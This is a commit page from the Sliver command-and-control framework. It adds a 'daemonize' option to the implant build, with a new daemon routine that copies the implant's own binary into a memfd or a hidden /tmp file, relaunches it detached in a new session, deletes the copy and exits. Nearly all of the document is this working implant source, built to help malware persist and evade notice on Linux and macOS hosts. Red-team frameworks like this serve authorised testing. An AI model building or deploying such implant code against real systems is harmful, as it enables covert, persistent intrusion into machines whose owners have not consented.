Add Daemon

BishopFox · Dec 2, 2021 · 75c4902 · 75c4902
1 parent 0c7c7b5
commit 75c4902
Show file tree

Hide file tree

Showing 10 changed files with 578 additions and 467 deletions.
diff --git a/client/command/commands.go b/client/command/commands.go
@@ -1008,6 +1008,8 @@ func BindCommands(con *console.SliverConsoleClient) {
 			f.String("f", "format", "exe", "Specifies the output formats, valid values are: 'exe', 'shared' (for dynamic libraries), 'service' (see `psexec` for more info) and 'shellcode' (windows only)")
 			f.String("s", "save", "", "directory/file to the binary to")
 
+			f.Bool("D", "daemonize", false, "daemonize implant on start")
+
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
 		},
 		Run: func(ctx *grumble.Context) error {

diff --git a/client/command/generate/generate.go b/client/command/generate/generate.go
@@ -252,6 +252,8 @@ func parseCompileFlags(ctx *grumble.Context, con *console.SliverConsoleClient) *
 		configFormat = clientpb.OutputFormat_EXECUTABLE
 	}
 
+	isDaemon := bool(ctx.Flags.Bool("daemonize"))
+
 	targetOS := strings.ToLower(ctx.Flags.String("os"))
 	targetArch := strings.ToLower(ctx.Flags.String("arch"))
 	targetOS, targetArch = getTargets(targetOS, targetArch, con)
@@ -262,6 +264,10 @@ func parseCompileFlags(ctx *grumble.Context, con *console.SliverConsoleClient) *
 		con.PrintErrorf("Named pipe pivoting can only be used in Windows.")
 		return nil
 	}
+	if isDaemon && targetOS == "windows" {
+		con.PrintErrorf("Daemon cannot be used in Windows.")
+		return nil
+	}
 
 	// Check to see if we can *probably* build the target binary
 	if !checkBuildTargetCompatibility(configFormat, targetOS, targetArch, con) {
@@ -307,6 +313,7 @@ func parseCompileFlags(ctx *grumble.Context, con *console.SliverConsoleClient) *
 		IsSharedLib: isSharedLib,
 		IsService:   isService,
 		IsShellcode: isShellcode,
+		IsDaemon:    isDaemon,
 	}
 
 	return config

diff --git a/implant/sliver/daemon/daemon.go b/implant/sliver/daemon/daemon.go
@@ -0,0 +1,67 @@
+package daemon
+
+import (
+	// {{if.Config.Debug}}
+	"log"
+	// {{end}}
+	"github.com/bishopfox/sliver/implant/sliver/taskrunner"
+	"os"
+	"syscall"
+	"time"
+)
+
+func Daemonize() {
+	// {{if .Config.Debug}}
+	log.Println("Daemonizing")
+	// {{end}}
+	c, _ := syscall.Read(0, nil)
+	if c == -1 {
+		return
+	}
+	var ex []byte
+	px, err := os.Executable()
+	if err != nil {
+		ex, err = os.ReadFile("/proc/self/exe")
+		if err != nil {
+			return
+		}
+	} else {
+		ex, err = os.ReadFile(string(px))
+		if err != nil {
+			return
+		}
+	}
+	file, err := taskrunner.SideloadFile(ex)
+	if err != nil {
+		return
+	}
+
+	// {{if .Config.Debug}}
+	log.Printf("SideLoaded File: %s\n", file)
+	// {{end}}
+
+	attr := &os.ProcAttr{
+		Dir:   "/",
+		Env:   os.Environ(),
+		Files: []*os.File{nil, nil, nil},
+		Sys: &syscall.SysProcAttr{
+			Setsid: true,
+		},
+	}
+	child, err := os.StartProcess(file, os.Args, attr)
+	if err != nil {
+		return
+	}
+
+	// {{if .Config.Debug}}
+	log.Printf("Child: ", child, "\n")
+	// {{end}}
+
+	child.Release()
+	// Time for OS to load
+	time.Sleep(200 * time.Millisecond)
+	_ = os.Remove(file)
+	os.Exit(0)
+
+	return
+}
diff --git a/implant/sliver/sliver.go b/implant/sliver/sliver.go
@@ -66,6 +66,9 @@ import (
 	// {{if .Config.IsService}}
 	"golang.org/x/sys/windows/svc"
 	// {{end}}
+	// {{if .Config.IsDaemon}}
+	"github.com/bishopfox/sliver/implant/sliver/daemon"
+	// {{end}}
 )
 
 var (
@@ -171,7 +174,6 @@ func DllUnregisterServer() { main() }
 // {{end}}
 
 func main() {
-
 	// {{if .Config.Debug}}
 	log.SetFlags(log.LstdFlags | log.Lshortfile)
 	// {{else}}
@@ -185,6 +187,10 @@ func main() {
 
 	limits.ExecLimits() // Check to see if we should execute
 
+	// {{if .Config.IsDaemon}}
+	daemon.Daemonize()
+	// {{end}}
+
 	// {{if .Config.IsService}}
 	svc.Run("", &sliverService{})
 	// {{else}}

diff --git a/implant/sliver/taskrunner/task_darwin.go b/implant/sliver/taskrunner/task_darwin.go
@@ -57,15 +57,21 @@ func RemoteTask(processID int, data []byte, rwxPages bool) error {
 	return nil
 }
 
+// SideloadFile - Create a file for use with Sideload
+func SideloadFile(data []byte) (string, error) {
+	fdPath := fmt.Sprintf("/tmp/.%s", randomString(10))
+	err := ioutil.WriteFile(fdPath, data, 0755)
+	return fdPath, err
+}
+
 // Sideload - Side load a library and return its output
 func Sideload(procName string, data []byte, args string, kill bool) (string, error) {
 	var (
 		stdOut bytes.Buffer
 		stdErr bytes.Buffer
 		wg     sync.WaitGroup
 	)
-	fdPath := fmt.Sprintf("/tmp/.%s", randomString(10))
-	err := ioutil.WriteFile(fdPath, data, 0755)
+	fdPath, err := SideloadFile(data)
 	if err != nil {
 		return "", err
 	}

diff --git a/implant/sliver/taskrunner/task_linux.go b/implant/sliver/taskrunner/task_linux.go
@@ -55,14 +55,9 @@ func RemoteTask(processID int, data []byte, rwxPages bool) error {
 	return nil
 }
 
-// Sideload - Side load a library and return its output
-func Sideload(procName string, data []byte, args string, kill bool) (string, error) {
-	var (
-		nrMemfdCreate int
-		stdOut        bytes.Buffer
-		stdErr        bytes.Buffer
-		wg            sync.WaitGroup
-	)
+// SideloadFile - Create a file for use with Sideload
+func SideloadFile(data []byte) (string, error) {
+	var nrMemfdCreate int
 	memfdName := randomString(8)
 	memfd, err := syscall.BytePtrFromString(memfdName)
 	if err != nil {
@@ -89,6 +84,20 @@ func Sideload(procName string, data []byte, args string, kill bool) (string, err
 	//{{if .Config.Debug}}
 	log.Printf("Data written in %s\n", fdPath)
 	//{{end}}
+	return fdPath, nil
+}
+
+// Sideload - Side load a library and return its output
+func Sideload(procName string, data []byte, args string, kill bool) (string, error) {
+	var (
+		stdOut bytes.Buffer
+		stdErr bytes.Buffer
+		wg     sync.WaitGroup
+	)
+	fdPath, err := SideloadFile(data)
+	if err != nil {
+		return "", err
+	}
 	env := os.Environ()
 	newEnv := []string{
 		fmt.Sprintf("LD_PARAMS=%s", args),